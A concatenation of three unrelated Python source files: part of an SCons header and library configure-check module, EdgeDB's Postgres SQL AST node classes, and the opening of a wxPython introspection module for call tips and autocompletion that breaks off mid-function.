    """Produce C '#include' statements from the given header name(s).

    Used by CheckHeader and CheckLibWithHeader.

    @param headers: a single header name or a list of header names.
    @param leaveLast: if true, the last header is not turned into an
        #include line but returned separately so the caller can test it.
    @param include_quotes: two-character string with the opening and
        closing include delimiters, e.g. '""' or '<>'.
    @return: tuple (include_text, last_header); last_header is None
        unless leaveLast was set (and there was at least one header).
    """
    if not SCons.Util.is_List(headers):
        headers = [headers]
    # Robustness fix: the original unconditionally did headers[-1] when
    # leaveLast was set, raising IndexError for an empty header list.
    if leaveLast and headers:
        lastHeader = headers[-1]
        headers = headers[:-1]
    else:
        lastHeader = None
    includes = ''.join("#include %s%s%s\n"
                       % (include_quotes[0], s, include_quotes[1])
                       for s in headers)
    return includes, lastHeader
def CheckHeader(context, header, include_quotes = '<>', language = None):
    """
    A test for a C or C++ header file.

    'header' may be a single name or a list; all but the last entry are
    emitted as prerequisite #include lines, and the last one is the
    header actually being checked.  Returns True on success.
    """
    prog_prefix, hdr_to_check = \
        createIncludesFromHeaders(header, 1, include_quotes)
    res = SCons.Conftest.CheckHeader(context, hdr_to_check, prog_prefix,
                                     language = language,
                                     include_quotes = include_quotes)
    context.did_show_result = 1
    return not res
# Sanity checks that the configured compilers actually work.
# Each returns True on success (Conftest returns 0 for success).
def CheckCC(context):
    res = SCons.Conftest.CheckCC(context)
    context.did_show_result = 1
    return not res

def CheckCXX(context):
    res = SCons.Conftest.CheckCXX(context)
    context.did_show_result = 1
    return not res

def CheckSHCC(context):
    res = SCons.Conftest.CheckSHCC(context)
    context.did_show_result = 1
    return not res

def CheckSHCXX(context):
    res = SCons.Conftest.CheckSHCXX(context)
    context.did_show_result = 1
    return not res
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCHeader(context, header, include_quotes = '""'):
    """
    A test for a C header file.  Convenience wrapper around CheckHeader().
    """
    return CheckHeader(context, header, include_quotes, language = "C")

# Bram: Make this function obsolete? CheckHeader() is more generic.

def CheckCXXHeader(context, header, include_quotes = '""'):
    """
    A test for a C++ header file.  Convenience wrapper around CheckHeader().
    """
    return CheckHeader(context, header, include_quotes, language = "C++")
def CheckLib(context, library = None, symbol = "main",
             header = None, language = None, autoadd = 1):
    """
    A test for a library. See also CheckLibWithHeader.
    Note that library may also be None to test whether the given symbol
    compiles without flags.

    When autoadd is true, the first library that works is appended to
    $LIBS.  Returns True on success.
    """
    # [] is treated like None: check whether the symbol links bare.
    if library == []:
        library = [None]
    if not SCons.Util.is_List(library):
        library = [library]
    # ToDo: accept path for the library
    res = SCons.Conftest.CheckLib(context, library, symbol, header = header,
                                  language = language, autoadd = autoadd)
    context.did_show_result = 1
    return not res
# XXX
# Bram: Can only include one header and can't use #ifdef HAVE_HEADER_H.
def CheckLibWithHeader(context, libs, header, language,
                       call = None, autoadd = 1):
    # ToDo: accept path for library. Support system header files.
    """
    Another (more sophisticated) test for a library.
    Checks, if library and header is available for language (may be 'C'
    or 'CXX'). Call maybe be a valid expression _with_ a trailing ';'.
    As in CheckLib, we support library=None, to test if the call compiles
    without extra link flags.
    """
    # All headers become prerequisite #include lines (leaveLast=0).
    prog_prefix, dummy = \
        createIncludesFromHeaders(header, 0)
    if libs == []:
        libs = [None]
    if not SCons.Util.is_List(libs):
        libs = [libs]
    # symbol=None: only the 'call' expression (if any) is exercised.
    res = SCons.Conftest.CheckLib(context, libs, None, prog_prefix,
                                  call = call, language = language, autoadd = autoadd)
    context.did_show_result = 1
    return not res
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import enum
import dataclasses
import typing
import uuid
from edb.common import ast
from edb.common import typeutils
from edb.edgeql import ast as qlast
from edb.ir import ast as irast
# The structure of the nodes mostly follows that of Postgres'
# parsenodes.h and primnodes.h, but only with fields that are
# relevant to parsing and code generation.
#
# Certain nodes have EdgeDB-specific fields used by the
# compiler.
class Base(ast.AST):
    """Common root of all SQL AST nodes in this module."""

    def __repr__(self):
        cls_name = self.__class__.__name__
        return '<pg.%s at 0x%x>' % (cls_name, id(self))

    def dump_sql(self) -> None:
        # Imported lazily so the debug helper is only a runtime dependency.
        from edb.common.debug import dump_sql
        dump_sql(self)
class ImmutableBase(ast.ImmutableASTMixin, Base):
    """Base for nodes that must not be mutated after construction."""
    pass


class Alias(ImmutableBase):
    """Alias for a range variable."""

    # aliased relation name
    aliasname: str

    # optional list of column aliases
    colnames: typing.Optional[typing.List[str]] = None


class Keyword(ImmutableBase):
    """An SQL keyword that must be output without quoting."""

    name: str  # Keyword name


class Star(Base):
    """'*' representing all columns of a table or compound field."""
class BaseExpr(Base):
    """Any non-statement expression node that returns a value."""

    __ast_meta__ = {'nullable'}

    nullable: typing.Optional[bool] = None  # Whether the result can be NULL.
    ser_safe: bool = False  # Whether the expr is serialization-safe.

    def __init__(self, *, nullable: typing.Optional[bool]=None,
                 **kwargs) -> None:
        # Resolve nullability eagerly so every node carries a concrete value.
        nullable = self._is_nullable(kwargs, nullable)
        super().__init__(nullable=nullable, **kwargs)

    def _is_nullable(self, kwargs: typing.Dict[str, object],
                     nullable: typing.Optional[bool]) -> bool:
        # An explicit argument wins; otherwise fall back to the 'nullable'
        # field default declared on the subclass, and finally infer from
        # the child nodes passed via kwargs.
        if nullable is None:
            default = type(self).get_field('nullable').default
            if default is not None:
                nullable = default
            else:
                nullable = self._infer_nullability(kwargs)
        return nullable

    def _infer_nullability(self, kwargs: typing.Dict[str, object]) -> bool:
        nullable = False
        for v in kwargs.values():
            if typeutils.is_container(v):
                items = typing.cast(typing.Iterable, v)
                # NOTE(review): all() over an *empty* container yields True,
                # so an empty child collection marks the node nullable and
                # also overwrites any earlier False — confirm intended.
                nullable = all(getattr(vv, 'nullable', False) for vv in items)
            elif getattr(v, 'nullable', None):
                nullable = True
            if nullable:
                break
        return nullable
class ImmutableBaseExpr(BaseExpr, ImmutableBase):
    """Immutable value-returning expression node."""
    pass


class OutputVar(ImmutableBaseExpr):
    """A base class representing expression output address."""

    # Whether this represents a packed array of data
    is_packed_multi: bool = False
class EdgeQLPathInfo(Base):
    """A general mixin providing EdgeQL-specific metadata on certain nodes."""

    # Ignore the below fields in AST visitor/transformer.
    __ast_meta__ = {
        'path_scope', 'path_outputs', 'path_id', 'is_distinct',
        'path_id_mask', 'path_namespace',
        'packed_path_outputs', 'packed_path_namespace',
    }

    # The path id represented by the node.
    path_id: typing.Optional[irast.PathId] = None

    # Whether the node represents a distinct set.
    is_distinct: bool = True

    # A subset of paths necessary to perform joining.
    path_scope: typing.Set[irast.PathId] = ast.field(factory=set)

    # Map of res target names corresponding to paths.
    path_outputs: typing.Dict[
        typing.Tuple[irast.PathId, str], OutputVar
    ] = ast.field(factory=dict)

    # Map of res target names corresponding to materialized paths.
    packed_path_outputs: typing.Optional[typing.Dict[
        typing.Tuple[irast.PathId, str],
        OutputVar,
    ]] = None

    def get_path_outputs(self, flavor: str) -> typing.Dict[
            typing.Tuple[irast.PathId, str], OutputVar]:
        # The 'packed' map is created lazily on first use; the 'normal'
        # map always exists.
        if flavor == 'packed':
            if self.packed_path_outputs is None:
                self.packed_path_outputs = {}
            return self.packed_path_outputs
        elif flavor == 'normal':
            return self.path_outputs
        else:
            raise AssertionError(f'unexpected flavor "{flavor}"')

    path_id_mask: typing.Set[irast.PathId] = ast.field(factory=set)

    # Map of col refs corresponding to paths.
    path_namespace: typing.Dict[
        typing.Tuple[irast.PathId, str], BaseExpr
    ] = ast.field(factory=dict)

    # Same, but for packed.
    packed_path_namespace: typing.Optional[typing.Dict[
        typing.Tuple[irast.PathId, str],
        BaseExpr,
    ]] = None
class BaseRangeVar(ImmutableBaseExpr):
    """Range variable, used in FROM clauses."""

    __ast_meta__ = {'schema_object_id', 'tag'}

    # This is a hack, since there is some code that relies on not
    # having an alias on a range var (to refer to a CTE directly, for
    # example, while other code depends on reading the alias name out
    # of range vars. This is mostly disjoint code, so we hack around it
    # with an empty aliasname.
    # NOTE(review): this default Alias instance is shared by every rvar
    # that does not set its own — safe only while Alias stays immutable.
    alias: Alias = Alias(aliasname='')

    #: The id of the schema object this rvar represents
    schema_object_id: typing.Optional[uuid.UUID] = None

    #: Optional identification piece to describe what's inside the rvar
    tag: typing.Optional[str] = None

    def __repr__(self) -> str:
        return (
            f'<pg.{self.__class__.__name__} '
            f'alias={self.alias.aliasname} '
            f'at {id(self):#x}>'
        )
class BaseRelation(EdgeQLPathInfo, BaseExpr):
    """Any relation-valued node (table, subquery body, CTE query, ...)."""

    name: typing.Optional[str] = None
    nullable: typing.Optional[bool] = None  # Whether the result can be NULL.


class Relation(BaseRelation):
    """Regular relation."""

    catalogname: typing.Optional[str] = None
    schemaname: typing.Optional[str] = None


class CommonTableExpr(Base):
    """A single WITH-clause entry (CTE)."""

    # Query name (unqualified)
    name: str

    # Whether the result can be NULL.
    nullable: typing.Optional[bool] = None

    # Optional list of column names
    aliascolnames: typing.Optional[list] = None

    # The CTE query
    query: Query

    # True if this CTE is recursive
    recursive: bool = False

    # If specified, determines if CTE is [NOT] MATERIALIZED
    materialized: typing.Optional[bool] = None

    def __repr__(self):
        return (
            f'<pg.{self.__class__.__name__} '
            f'name={self.name!r} at 0x{id(self):x}>'
        )
class PathRangeVar(BaseRangeVar):
    """A range var that carries EdgeQL path information."""

    #: The IR TypeRef this rvar represents (if any).
    typeref: typing.Optional[irast.TypeRef] = None

    @property
    def query(self) -> BaseRelation:
        # Subclasses must expose the relation they range over.
        raise NotImplementedError


class RelRangeVar(PathRangeVar):
    """Relation range variable, used in FROM clauses."""

    relation: typing.Union[BaseRelation, CommonTableExpr]
    include_inherited: bool = True

    @property
    def query(self) -> BaseRelation:
        # A CTE wraps its query; a plain relation is its own query.
        if isinstance(self.relation, CommonTableExpr):
            return self.relation.query
        else:
            return self.relation

    def __repr__(self) -> str:
        return (
            f'<pg.{self.__class__.__name__} '
            f'name={self.relation.name!r} alias={self.alias.aliasname} '
            f'at {id(self):#x}>'
        )


class IntersectionRangeVar(PathRangeVar):
    """A pseudo range var composed of several component rvars."""

    component_rvars: typing.List[PathRangeVar]


class TypeName(ImmutableBase):
    """Type in definitions and casts."""

    name: typing.Tuple[str, ...]  # Type name
    setof: bool = False  # SET OF?
    typmods: typing.Optional[list] = None  # Type modifiers
    array_bounds: typing.Optional[list] = None  # Array bounds
class ColumnRef(OutputVar):
    """Specifies a reference to a column."""

    # Column name list.
    name: typing.Sequence[typing.Union[str, Star]]

    # Whether the col is an optional path bond (i.e accepted when NULL)
    optional: typing.Optional[bool] = None

    def __repr__(self):
        # 'name' may be unset on partially-constructed nodes.
        if hasattr(self, 'name'):
            return (
                f'<pg.{self.__class__.__name__} '
                f'name={".".join(self.name)!r} at 0x{id(self):x}>'
            )
        else:
            return super().__repr__()


class TupleElementBase(ImmutableBase):
    """One element of a (possibly named) tuple, without a value."""

    path_id: irast.PathId
    name: typing.Optional[typing.Union[OutputVar, str]]

    def __init__(self, path_id: irast.PathId,
                 name: typing.Optional[typing.Union[OutputVar, str]]=None):
        self.path_id = path_id
        self.name = name

    def __repr__(self):
        return f'<{self.__class__.__name__} ' \
               f'name={self.name} path_id={self.path_id}>'


class TupleElement(TupleElementBase):
    """A tuple element that also carries its value expression."""

    val: BaseExpr

    def __init__(self, path_id: irast.PathId, val: BaseExpr, *,
                 name: typing.Optional[typing.Union[OutputVar, str]]=None):
        super().__init__(path_id, name)
        self.val = val

    def __repr__(self):
        return f'<{self.__class__.__name__} ' \
               f'name={self.name} val={self.val} path_id={self.path_id}>'
class TupleVarBase(OutputVar):
    """Output address of a tuple of columns."""

    elements: typing.Sequence[TupleElementBase]
    named: bool  # True if the tuple elements are addressed by name.
    nullable: bool
    typeref: typing.Optional[irast.TypeRef]

    def __init__(self, elements: typing.List[TupleElementBase], *,
                 named: bool=False, nullable: bool=False,
                 is_packed_multi: bool=False,
                 typeref: typing.Optional[irast.TypeRef]=None):
        self.elements = elements
        self.named = named
        self.nullable = nullable
        self.is_packed_multi = is_packed_multi
        self.typeref = typeref

    def __repr__(self):
        return f'<{self.__class__.__name__} [{self.elements!r}]'


class TupleVar(TupleVarBase):
    """TupleVarBase whose elements carry value expressions."""

    elements: typing.Sequence[TupleElement]

    def __init__(self, elements: typing.List[TupleElement], *,
                 named: bool=False, nullable: bool=False,
                 is_packed_multi: bool=False,
                 typeref: typing.Optional[irast.TypeRef]=None):
        self.elements = elements
        self.named = named
        self.nullable = nullable
        self.is_packed_multi = is_packed_multi
        self.typeref = typeref


class BaseParamRef(ImmutableBaseExpr):
    """Base class for query-parameter references."""
    pass


class ParamRef(BaseParamRef):
    """Query parameter ($0..$n)."""

    # Number of the parameter.
    number: int


class NamedParamRef(BaseParamRef):
    """Named query parameter."""

    name: str
class ResTarget(ImmutableBaseExpr):
    """Query result target."""

    # Column name (optional)
    name: typing.Optional[str] = None

    # subscripts, field names and '*'
    indirection: typing.Optional[list] = None

    # value expression to compute
    val: BaseExpr


class UpdateTarget(ImmutableBaseExpr):
    """Query update target."""

    # column name (optional)
    name: str

    # value expression to assign
    val: BaseExpr


class InferClause(ImmutableBaseExpr):
    """Conflict-target specification of an ON CONFLICT clause."""

    # IndexElems to infer unique index
    index_elems: typing.Optional[list] = None

    # Partial-index predicate
    where_clause: typing.Optional[BaseExpr] = None

    # Constraint name
    conname: typing.Optional[str] = None


class OnConflictClause(ImmutableBaseExpr):
    """ON CONFLICT clause of an INSERT."""

    action: str
    infer: typing.Optional[InferClause]
    target_list: typing.Optional[list] = None
    where: typing.Optional[BaseExpr] = None


class ReturningQuery(BaseRelation):
    """A relation that produces a list of result targets."""

    target_list: typing.List[ResTarget] = ast.field(factory=list)


class NullRelation(ReturningQuery):
    """Special relation that produces nulls for all its attributes."""

    where_clause: typing.Optional[BaseExpr] = None


@dataclasses.dataclass(frozen=True)
class Param:
    """Compile-time description of a query parameter."""

    #: postgres' variable index
    index: int

    #: whether parameter is required
    required: bool
class Query(ReturningQuery):
    """Generic superclass representing a query."""

    # Ignore the below fields in AST visitor/transformer.
    __ast_meta__ = {'path_rvar_map', 'path_packed_rvar_map',
                    'view_path_id_map', 'argnames', 'nullable'}

    # Maps outer path ids to the ids used within this query.
    view_path_id_map: typing.Dict[
        irast.PathId, irast.PathId
    ] = ast.field(factory=dict)

    # Map of RangeVars corresponding to paths.
    path_rvar_map: typing.Dict[
        typing.Tuple[irast.PathId, str], PathRangeVar
    ] = ast.field(factory=dict)

    # Map of materialized RangeVars corresponding to paths.
    path_packed_rvar_map: typing.Optional[typing.Dict[
        typing.Tuple[irast.PathId, str],
        PathRangeVar,
    ]] = None

    # Named query arguments, if any.
    argnames: typing.Optional[typing.Dict[str, Param]] = None

    # WITH-clause entries attached to this query.
    ctes: typing.Optional[typing.List[CommonTableExpr]] = None

    def get_rvar_map(self, flavor: str) -> typing.Dict[
            typing.Tuple[irast.PathId, str], PathRangeVar]:
        # The 'packed' map is created lazily on first use.
        if flavor == 'packed':
            if self.path_packed_rvar_map is None:
                self.path_packed_rvar_map = {}
            return self.path_packed_rvar_map
        elif flavor == 'normal':
            return self.path_rvar_map
        else:
            raise AssertionError(f'unexpected flavor "{flavor}"')

    def maybe_get_rvar_map(self, flavor: str) -> typing.Optional[typing.Dict[
            typing.Tuple[irast.PathId, str], PathRangeVar]]:
        # Like get_rvar_map(), but never instantiates the packed map.
        if flavor == 'packed':
            return self.path_packed_rvar_map
        elif flavor == 'normal':
            return self.path_rvar_map
        else:
            raise AssertionError(f'unexpected flavor "{flavor}"')

    @property
    def ser_safe(self):
        # A query is serialization-safe iff all of its targets are.
        return all(t.ser_safe for t in self.target_list)

    def append_cte(self, cte: CommonTableExpr) -> None:
        if self.ctes is None:
            self.ctes = []
        self.ctes.append(cte)
class DMLQuery(Query):
    """Generic superclass for INSERT/UPDATE/DELETE statements."""

    # Target relation to perform the operation on.
    relation: typing.Optional[PathRangeVar] = None

    # List of expressions returned
    returning_list: typing.List[ResTarget] = ast.field(factory=list)

    @property
    def target_list(self):
        # For DML statements the "targets" are the RETURNING expressions.
        return self.returning_list


class InsertStmt(DMLQuery):
    """INSERT statement."""

    # (optional) list of target column names
    cols: typing.Optional[typing.List[ColumnRef]] = None

    # source SELECT/VALUES or None
    select_stmt: typing.Optional[Query] = None

    # ON CONFLICT clause
    on_conflict: typing.Optional[OnConflictClause] = None


class UpdateStmt(DMLQuery):
    """UPDATE statement."""

    # The UPDATE target list
    targets: typing.List[UpdateTarget] = ast.field(factory=list)

    # WHERE clause
    where_clause: typing.Optional[BaseExpr] = None

    # optional FROM clause
    from_clause: typing.List[BaseRangeVar] = ast.field(factory=list)


class DeleteStmt(DMLQuery):
    """DELETE statement."""

    # WHERE clause
    where_clause: typing.Optional[BaseExpr] = None

    # optional USING clause
    using_clause: typing.List[BaseRangeVar] = ast.field(factory=list)
class SelectStmt(Query):
    """SELECT statement; also represents set operations via op/larg/rarg."""

    # List of DISTINCT ON expressions, empty list for DISTINCT ALL
    distinct_clause: typing.Optional[list] = None

    # The target list
    target_list: typing.List[ResTarget] = ast.field(factory=list)

    # The FROM clause
    from_clause: typing.List[BaseRangeVar] = ast.field(factory=list)

    # The WHERE clause
    where_clause: typing.Optional[BaseExpr] = None

    # GROUP BY clauses
    group_clause: typing.Optional[typing.List[Base]] = None

    # HAVING expression
    having: typing.Optional[BaseExpr] = None

    # WINDOW window_name AS(...),
    window_clause: typing.Optional[typing.List[Base]] = None

    # List of ImplicitRow's in a VALUES query
    values: typing.Optional[typing.List[Base]] = None

    # ORDER BY clause
    sort_clause: typing.Optional[typing.List[SortBy]] = None

    # OFFSET expression
    limit_offset: typing.Optional[BaseExpr] = None

    # LIMIT expression
    limit_count: typing.Optional[BaseExpr] = None

    # FOR UPDATE clause
    locking_clause: typing.Optional[list] = None

    # Set operation type
    op: typing.Optional[str] = None

    # ALL modifier
    all: bool = False

    # Left operand of set op
    larg: typing.Optional[Query] = None

    # Right operand of set op,
    rarg: typing.Optional[Query] = None
class ExprKind(enum.IntEnum):
    """Kind of an Expr node."""

    OP = enum.auto()


class Expr(ImmutableBaseExpr):
    """Infix, prefix, and postfix expressions."""

    # Operator kind
    kind: ExprKind

    # Possibly-qualified name of operator
    name: str

    # Left argument, if any
    lexpr: typing.Optional[BaseExpr] = None

    # Right argument, if any
    rexpr: typing.Optional[BaseExpr] = None


class BaseConstant(ImmutableBaseExpr):
    """Base for literal constants."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Every constant except NULL must carry a value.
        if not isinstance(self, NullConstant) and self.val is None:
            raise ValueError('cannot create a pgast.Constant without a value')


class StringConstant(BaseConstant):
    """A literal string constant."""

    # Constant value
    val: str


class NullConstant(BaseConstant):
    """A NULL constant."""

    nullable: bool = True


class ByteaConstant(BaseConstant):
    """A bytea string."""

    val: str


class NumericConstant(BaseConstant):
    # Value kept as its source text.
    val: str


class BooleanConstant(BaseConstant):
    # Value kept as its source text.
    val: str
class LiteralExpr(ImmutableBaseExpr):
    """A literal expression."""

    # Expression text
    expr: str


class TypeCast(ImmutableBaseExpr):
    """A CAST expression."""

    # Expression being casted.
    arg: BaseExpr

    # Target type.
    type_name: TypeName


class CollateClause(ImmutableBaseExpr):
    """A COLLATE expression."""

    # Input expression
    arg: BaseExpr

    # Possibly-qualified collation name
    collname: str


class VariadicArgument(ImmutableBaseExpr):
    """A VARIADIC argument in a function call."""

    expr: BaseExpr
    nullable: bool = False


class ColumnDef(ImmutableBase):
    """A column definition (name and type)."""

    # name of column
    name: str

    # type of column
    typename: TypeName

    # default value, if any
    default_expr: typing.Optional[BaseExpr] = None

    # COLLATE clause, if any
    coll_clause: typing.Optional[BaseExpr] = None
class FuncCall(ImmutableBaseExpr):
    """A function call, including aggregate and window invocations."""

    # Function name
    name: typing.Tuple[str, ...]

    # List of arguments
    args: typing.List[BaseExpr]

    # ORDER BY
    agg_order: typing.List[SortBy]

    # FILTER clause
    agg_filter: BaseExpr

    # Argument list is '*'
    agg_star: bool

    # Arguments were labeled DISTINCT
    agg_distinct: bool

    # OVER clause, if any
    over: typing.Optional[WindowDef]

    # WITH ORDINALITY
    with_ordinality: bool = False

    # list of ColumnDef nodes to describe result of
    # the function returning RECORD.
    coldeflist: typing.List[ColumnDef]

    def __init__(self, *, nullable: typing.Optional[bool]=None,
                 null_safe: bool=False, **kwargs) -> None:
        """Function call node.

        @param null_safe:
            Specifies whether this function is guaranteed
            to never return NULL on non-NULL input.
        """
        # Unless declared null-safe, assume the call may produce NULL.
        if nullable is None and not null_safe:
            nullable = True
        super().__init__(nullable=nullable, **kwargs)
class NamedFuncArg(ImmutableBaseExpr):
    """A named (name => value) function-call argument."""

    name: str
    val: BaseExpr


class Indices(ImmutableBase):
    """Array subscript or slice bounds."""

    # True, if slice
    is_slice: bool

    # Lower bound, if any
    lidx: BaseExpr

    # Upper bound if any
    ridx: BaseExpr


class Indirection(ImmutableBaseExpr):
    """Field and/or array element indirection."""

    # Indirection subject
    arg: BaseExpr

    # Subscripts and/or field names and/or '*'
    indirection: list


class ArrayExpr(ImmutableBaseExpr):
    """ARRAY[] construct."""

    # array element expressions
    elements: typing.List[BaseExpr]


class MultiAssignRef(ImmutableBase):
    """UPDATE (a, b, c) = row-valued-expr."""

    # row-valued expression
    source: BaseExpr

    # list of columns to assign to
    columns: typing.List[ColumnRef]


class SortBy(ImmutableBase):
    """ORDER BY clause element."""

    # expression to sort on
    node: BaseExpr

    # ASC/DESC/USING/default
    dir: typing.Optional[qlast.SortOrder] = None

    # NULLS FIRST/LAST
    nulls: typing.Optional[qlast.NonesOrder] = None


class WindowDef(ImmutableBase):
    """WINDOW and OVER clauses."""

    # window name
    name: typing.Optional[str] = None

    # referenced window name, if any
    refname: typing.Optional[str] = None

    # PARTITION BY expr list
    partition_clause: typing.Optional[typing.List[BaseExpr]] = None

    # ORDER BY
    order_clause: typing.Optional[typing.List[SortBy]] = None

    # Window frame options
    frame_options: typing.Optional[list] = None

    # expression for starting bound, if any
    start_offset: typing.Optional[BaseExpr] = None

    # expression for ending bound, if any
    end_offset: typing.Optional[BaseExpr] = None
class RangeSubselect(PathRangeVar):
    """Subquery appearing in FROM clauses."""

    lateral: bool = False
    subquery: Query

    @property
    def query(self):
        return self.subquery


class RangeFunction(BaseRangeVar):
    """Function call appearing in a FROM clause."""

    lateral: bool = False

    # WITH ORDINALITY
    with_ordinality: bool = False

    # ROWS FROM form
    is_rowsfrom: bool = False

    functions: typing.List[FuncCall]


class JoinExpr(BaseRangeVar):
    """A JOIN of two range variables."""

    # Type of join
    type: str

    # Left subtree
    larg: BaseExpr

    # Right subtree
    rarg: BaseExpr

    # USING clause, if any
    using_clause: typing.Optional[typing.List[BaseExpr]] = None

    # Qualifiers on join, if any
    quals: typing.Optional[BaseExpr] = None

    def copy(self):
        result = self.__class__()
        result.copyfrom(self)
        return result

    def copyfrom(self, other):
        # NOTE(review): 'using_clause' is not copied here, so copy() drops
        # it — confirm whether that is intentional.
        self.larg = other.larg
        self.rarg = other.rarg
        self.quals = other.quals
        self.type = other.type
class SubLinkType(enum.IntEnum):
    """Kind of a SubLink subquery expression."""

    EXISTS = enum.auto()
    NOT_EXISTS = enum.auto()
    ALL = enum.auto()
    ANY = enum.auto()


class SubLink(ImmutableBaseExpr):
    """Subselect appearing in an expression."""

    # Type of sublink
    type: SubLinkType

    # Sublink expression
    expr: BaseExpr

    # Sublink is never NULL
    nullable: bool = False


class RowExpr(ImmutableBaseExpr):
    """A ROW() expression."""

    # The fields.
    args: typing.List[BaseExpr]

    # Row expressions, while may contain NULLs, are not NULL themselves.
    nullable: bool = False


class ImplicitRowExpr(ImmutableBaseExpr):
    """A (a, b, c) expression."""

    # The fields.
    args: typing.Sequence[BaseExpr]

    # Row expressions, while may contain NULLs, are not NULL themselves.
    nullable: bool = False


class CoalesceExpr(ImmutableBaseExpr):
    """A COALESCE() expression."""

    # The arguments.
    args: typing.List[Base]


class NullTest(ImmutableBaseExpr):
    """IS [NOT] NULL."""

    # Input expression,
    arg: BaseExpr

    # NOT NULL?
    negated: bool = False

    # NullTest is never NULL
    nullable: bool = False
class CaseWhen(ImmutableBase):
    """A single WHEN ... THEN ... arm of a CASE expression."""

    # Condition expression
    expr: BaseExpr

    # substitution result
    result: BaseExpr


class CaseExpr(ImmutableBaseExpr):
    """A CASE ... END expression."""

    # Equality comparison argument
    arg: typing.Optional[BaseExpr] = None

    # List of WHEN clauses
    args: typing.List[CaseWhen]

    # ELSE clause
    defresult: typing.Optional[BaseExpr] = None


# Re-export EdgeQL sort-order constants under SQL-flavored names.
SortAsc = qlast.SortAsc
SortDesc = qlast.SortDesc
SortDefault = qlast.SortDefault
NullsFirst = qlast.NonesFirst
NullsLast = qlast.NonesLast


class AlterSystem(ImmutableBaseExpr):
    """An ALTER SYSTEM setting (name and optional value)."""

    name: str
    value: typing.Optional[BaseExpr]


class Set(ImmutableBaseExpr):
    """A SET name = value configuration statement."""

    name: str
    value: BaseExpr


class ConfigureDatabase(ImmutableBase):
    """A per-database configuration setting."""

    database_name: str
    parameter_name: str
    value: BaseExpr


class IteratorCTE(ImmutableBase):
    """Linked list of enclosing iterator CTEs."""

    path_id: irast.PathId
    cte: CommonTableExpr
    parent: typing.Optional[IteratorCTE]
    is_dml_pseudo_iterator: bool = False
| |
"""Provides a variety of introspective-type support functions for
things like call tips and command auto completion."""
__author__ = "Patrick K. O'Brien <pobrien@orbtech.com>"
__cvsid__ = "$Id$"
__revision__ = "$Revision$"[11:-2]
import cStringIO
import inspect
import sys
import tokenize
import types
import wx
def getAutoCompleteList(command='', locals=None, includeMagic=1,
                        includeSingle=1, includeDouble=1):
    """Return list of auto-completion options for command.

    The list of options will be based on the locals namespace."""
    attributes = []
    # Get the proper chunk of code from the command.
    root = getRoot(command, terminator='.')
    try:
        # SECURITY NOTE: the root expression is eval()'d in the user's
        # namespace; acceptable only because this serves the user's own
        # interactive shell.
        if locals is not None:
            object = eval(root, locals)
        else:
            object = eval(root)
    except:
        # Bare except is deliberate: any failure to evaluate simply
        # means there are no completions to offer.
        pass
    else:
        attributes = getAttributeNames(object, includeMagic,
                                       includeSingle, includeDouble)
    return attributes
def getAttributeNames(object, includeMagic=1, includeSingle=1,
                      includeDouble=1):
    """Return list of unique attributes, including inherited, for object.

    @param includeMagic: also ask the object's _getAttributeNames() hook.
    @param includeSingle: keep attributes starting with one underscore.
    @param includeDouble: keep attributes starting with two underscores.
    """
    attributes = []
    if not hasattrAlwaysReturnsTrue(object):
        # Add some attributes that don't always get picked up.
        special_attrs = ['__bases__', '__class__', '__dict__', '__name__',
                         'func_closure', 'func_code', 'func_defaults',
                         'func_dict', 'func_doc', 'func_globals', 'func_name']
        attributes += [attr for attr in special_attrs \
                       if hasattr(object, attr)]
    if includeMagic:
        try: attributes += object._getAttributeNames()
        except: pass
        # Special code to allow traits to be caught by autocomplete
        if hasattr(object, 'trait_get'):
            try:
                for i in object.trait_get().keys():
                    if i not in attributes:
                        if hasattr(object, i):
                            # BUG FIX: was 'attributes += i', which extended
                            # the list with the individual *characters* of
                            # the trait name instead of the name itself.
                            attributes.append(i)
            except:
                pass
    # Get all attribute names.
    str_type = str(type(object))
    if str_type == "<type 'array'>":
        attributes += dir(object)
    else:
        attrdict = getAllAttributeNames(object)
        # Store the object's dir.
        object_dir = dir(object)
        for (obj_type_name, technique, count), attrlist in attrdict.items():
            # This complexity is necessary to avoid accessing all the
            # attributes of the object. This is very handy for objects
            # whose attributes are lazily evaluated.
            if type(object).__name__ == obj_type_name and technique == 'dir':
                attributes += attrlist
            else:
                attributes += [attr for attr in attrlist \
                               if attr not in object_dir and hasattr(object, attr)]
    # Remove duplicates from the attribute list.
    # (Renamed from 'dict', which shadowed the builtin.)
    seen = {}
    for item in attributes:
        seen[item] = None
    attributes = seen.keys()
    # new-style swig wrappings can result in non-string attributes
    # e.g. ITK http://www.itk.org/
    attributes = [attribute for attribute in attributes \
                  if type(attribute) == str]
    # Case-insensitive sort (Python 2 cmp-style comparator).
    attributes.sort(lambda x, y: cmp(x.upper(), y.upper()))
    if not includeSingle:
        attributes = filter(lambda item: item[0]!='_' \
                            or item[1:2]=='_', attributes)
    if not includeDouble:
        attributes = filter(lambda item: item[:2]!='__', attributes)
    return attributes
def hasattrAlwaysReturnsTrue(object):
    """Return true if the object claims to have any attribute at all.

    Remote proxy objects (xmlrpc, soap, etc.) often answer hasattr()
    affirmatively for every name; probing a nonsense attribute detects
    such objects.
    """
    bogus_name = 'bogu5_123_aTTri8ute'
    return hasattr(object, bogus_name)
def getAllAttributeNames(object):
    """Return dict of all attributes, including inherited, for an object.

    Recursively walk through a class and all base classes.

    The result maps (type-name, technique, count) keys to attribute-name
    lists, so the caller can tell *how* each batch was discovered.
    """
    attrdict = {}  # (object, technique, count): [list of attributes]
    # !!!
    # Do Not use hasattr() as a test anywhere in this function,
    # because it is unreliable with remote objects: xmlrpc, soap, etc.
    # They always return true for hasattr().
    # !!!
    try:
        # This could(?) fail if the type is poorly defined without
        # even a name.
        key = type(object).__name__
    except:
        key = 'anonymous'
    # Wake up sleepy objects - a hack for ZODB objects in "ghost" state.
    wakeupcall = dir(object)
    del wakeupcall
